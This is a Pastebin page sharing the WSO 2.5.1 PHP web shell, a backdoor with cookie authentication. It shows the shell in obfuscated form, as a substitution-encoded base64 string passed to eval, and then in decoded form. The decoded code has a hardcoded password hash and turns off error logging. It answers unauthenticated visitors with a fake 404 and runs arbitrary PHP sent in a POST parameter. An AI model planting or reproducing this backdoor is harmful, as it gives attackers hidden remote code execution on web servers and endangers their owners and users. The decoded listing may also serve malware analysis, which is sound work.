Advertisement
felmoltor

Backdoor with cookie auth ('WSO_VERSION', '2.5.1')

Oct 8th, 2014
387
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.95 KB | None | 0 0
  1. <?php
  2. $vORBC0O = Array('1'=>'X', '0'=>'j', '3'=>'G', '2'=>'W', '5'=>'c', '4'=>'4', '7'=>'f', '6'=>'v', '9'=>'V', '8'=>'2', 'A'=>'Z', 'C'=>'R', 'B'=>'Y', 'E'=>'L', 'D'=>'D', 'G'=>'s', 'F'=>'l', 'I'=>'t', 'H'=>'C', 'K'=>'g', 'J'=>'r', 'M'=>'1', 'L'=>'d', 'O'=>'J', 'N'=>'H', 'Q'=>'7', 'P'=>'8', 'S'=>'M', 'R'=>'n', 'U'=>'6', 'T'=>'O', 'W'=>'A', 'V'=>'E', 'Y'=>'o', 'X'=>'i', 'Z'=>'x', 'a'=>'e', 'c'=>'9', 'b'=>'u', 'e'=>'3', 'd'=>'T', 'g'=>'p', 'f'=>'y', 'i'=>'h', 'h'=>'k', 'k'=>'w', 'j'=>'B', 'm'=>'U', 'l'=>'0', 'o'=>'N', 'n'=>'z', 'q'=>'Q', 'p'=>'a', 's'=>'K', 'r'=>'I', 'u'=>'S', 't'=>'m', 'w'=>'q', 'v'=>'F', 'y'=>'P', 'x'=>'b', 'z'=>'5');
  3. function v550C16($vPIEFFC, $vD2APSF){$vOI6WVC = ''; for($i=0; $i < strlen($vPIEFFC); $i++){$vOI6WVC .= isset($vD2APSF[$vPIEFFC[$i]]) ? $vD2APSF[$vPIEFFC[$i]] : $vPIEFFC[$i];}
  4. return base64_decode($vOI6WVC);}
  5. $vXZL69O = 'O3vML3i753vn5fWcrHrMotSno8OXAdCiBdKkAdWMA2rMAtB4otVlT2rnSdh4SXrQHKYhB8cGxerKyuWXr8CtourQHXCh'.
  6. 'A2AiL2Zl18v0L3F6xXWcrHL3p2ZF5lMixX5QHXChA2AiL2Zl1e9nA9ciptv4rDlKLNOMAdGsO3'.
  7. 'CFAtvMxNC7B8ii5RoFLHWcrHL1p2zhxeLnEdVfodVRTkYsq3Fbp9cnA1qYO89f5tcf18Z6Af5GdF9SdHhQHhjgxtF7589ls'.
  8. 'HLGx8L7A1OfxeOnOfkksdGsq3Fbp9cnA1qYO8MiavcFa390L1Cgx'.
  9. '8z7L3FIAu5GSHhQHhjnA1C7L3FIA9cGp2MgLHKksdGsqNoFLvcIB2LgBMcZL2clA'.
  10. '1o75R9bL3FIAuKksdGsq3CFAtFbAuKR9Moy1MAvmFoOdl4REHWRSX4ME0VRsdGsHtFts3LFLvcIB2LgBMcZL2clA1o7Aej0sH'.
  11. 'hgrNGsrHWKr3AMxtolp2cbrvLddeol5tFk58Zi58iF5fKhB1OfB1hgrNGsrHWKrHWK'.
  12. 'rHjfA1CM5t4Kp1o7B1OfB1hYO3vf5tvzsuW/r3vf5tvz18Mi5H'.
  13. 'KR9Moy5eCfp1jnx3vnp39nOfkKO3vf5tvzsuWUrNol5tFk58Zi58iF5fKhB1OfB1hgTkYKrHWK7qYKrHWKOv'.
  14. 'cqdMomrDlK9Moy5eCfp1jnx3vnp39nsHC7mVcd9HhQHXWKrHWh1loydlIO'.
  15. 'CuWcrvLddeol5tFk58Zi58iF5fKh1loydlIOCuhQHRlsHtAMxtolp2cbrNLnxlZ6A8FbsHhKakYKrHWKp'.
  16. '39iA39fsHLr9vCqEnVbSHWlSDqKdtclrVA6L2zhOfhQHXWKrHjhp2mYr0qkoHrgTkgcHKg'.
  17. 'tL2z0L3F6xXj1mlcnA1C0x8cJp2mYO3GGrHC8sujQHXWKrHWh1loydlIOC9GhpMlKyuWhL0GsrHWKrNoFL3o6x8IgAuKhpf'.
  18. 'kKONBgTkgcHKggAXKiA2MkLNhYO3vML3i753vn5fhgrNGsrHWKr3Fts3Fn589lsHC7mVcd9vGR53vn5fLLsuWtOXWYx2qMsH'.
  19. 'C7mVcd9vGR53vn5fLLsuWcyuWhB19lpvckB1onsuhsrHWKrHWKrHj1mlcnA1C0x8cJp2mYx2'.
  20. 'qMsHC7ml9u9h9u2fLr9vCq1liymMqR1uhGrHCiL1CY1eji5eSgTkYsrHWKr3FtrHKip1onA1qYOvcDdlcEum9xx2qMsHC7'.
  21. 'ml9u9h9u2fLr9vCq1liymMqR1uFLsujP7HWYOvcDdlcEum9xx2qMsHC7'.
  22. 'ml9u9h9u2fLr9vCq1liymMqR1uFLrHVcrHCiL1CY1eji5eSgsqYKrHWKrHW'.
  23. 'KrNLnxlZ6A8FbsHhQHRlsHtAMxtolp2cbr3v0L3F6xFODsHhKakYKrHWKp2BYrmWh1Mjy'.
  24. 'mMCxOeWZOMlgrNGsrHWKrHWKrHWhBuWcr3vf5tvzsWYKrHWKrHWKrHWKrHWXL2zix2mXrDl+rNjY5vcMxtvIAuKgEWYKrHWKr'.
  25. 'HWKrHWKrHWX53ik1eAF5Rogx84XrDl+rNjY5NAF5Rogx84YsuksrHWKrHWKrHWKr'.
  26. 'HWKrRLnxMc8A1Onp2cbrXWcyXj1mlc79h9umlFydXksrHWKrHWKrHWKrHWKrRo'.
  27. 'iAt9Ix8CFrXWcyXjWp2zg18LFLHKR58vtA9cIx8CFOfhsrHWKrHWKrHWgTkYKrHWKrHWKr390p3PK589fp2vGp1gFsH'.
  28. 'CisdGsrHWKrNlKA2ZnAujQHXWKrHWKrHWKA1AixHKh1MjymMCxOeWZOMlgTk'.
  29. 'YKrHWK7qgcHtFtsHjFx1jlauKh1MjymMCxO8VR1uhKsqYKrHWKp2BYp1onA1qYO3CFAtvMxNC7B2olp2cbsuWtOX'.
  30. 'jtL2z0L3F6xFcFa3FnLNSYO8v0L3F6xX5KEXWhA39tB19GLvciBeCgx84gsqYKrHWKrHWKrHC7'.
  31. 'mVcd9vGRBuLLrDlKO3CFAtvMxNC7B2olp2cbTkYKrHWKA2ZnAqYKrH'.
  32. 'WKrHWKrHC7mVcd9vGRBuLLrDlKOMoFBlFbAtPRTkggAXKKr29I5NCzsHC7mVcd9vGRBuLLs'.
  33. 'uWtOXjtL2z0L3F6xFcFa3FnLNSYO8v0L3F6xX5KEXWh1MjymMCxO8VR1uhKsqYKrHW'.
  34. 'KB8vGxvcM589f18AMxtSYO8v0L3F6xX5KEXWh1MjymMCxO8VR1uhQHt94p1qQ';
  35. eval(v550C16($vXZL69O, $vORBC0O));?>
  36.  
  37. -------------------
  38. ----- DECODED -----
  39. -------------------
  40. <?php
  41. $auth_pass = "56c37bbe4aa80e05eb5ff86a49b31982";
  42.  
  43. $color = "#df5";
  44. $default_action = 'FilesMan';
  45. $default_use_ajax = true;
  46. $default_charset = 'Windows-1251';
  47.  
  48. @ini_set('error_log',NULL);
  49. @ini_set('log_errors',0);
  50. @ini_set('max_execution_time',0);
  51. @set_time_limit(0);
  52. @set_magic_quotes_runtime(0);
  53. @define('WSO_VERSION', '2.5.1');
  54.  
  55. if(get_magic_quotes_gpc()) {
  56.     function WSOstripslashes($array) {
  57.         return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  58.     }
  59.     $_POST = WSOstripslashes($_POST);
  60.     $_COOKIE = WSOstripslashes($_COOKIE);
  61. }
  62.  
  63. function wsoLogin() {
  64.     header('HTTP/1.0 404 Not Found');
  65.     die("404");
  66. }
  67.  
  68. function WSOsetcookie($k, $v) {
  69.     $_COOKIE[$k] = $v;
  70.     setcookie($k, $v);
  71. }
  72.  
  73. if(!empty($auth_pass)) {
  74.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  75.         WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  76.  
  77.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  78.         wsoLogin();
  79. }
  80.  
  81. function actionRC() {
  82.     if(!@$_POST['p1']) {
  83.         $a = array(
  84.             "uname" => php_uname(),
  85.             "php_version" => phpversion(),
  86.             "wso_version" => WSO_VERSION,
  87.             "safemode" => @ini_get('safe_mode')
  88.         );
  89.         echo serialize($a);
  90.     } else {
  91.         eval($_POST['p1']);
  92.     }
  93. }
  94. if( empty($_POST['a']) )
  95.     if(isset($default_action) && function_exists('action' . $default_action))
  96.         $_POST['a'] = $default_action;
  97.     else
  98.         $_POST['a'] = 'SecInfo';
  99. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  100.     call_user_func('action' . $_POST['a']);
  101. exit;
  102. ?>
  103. 404
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement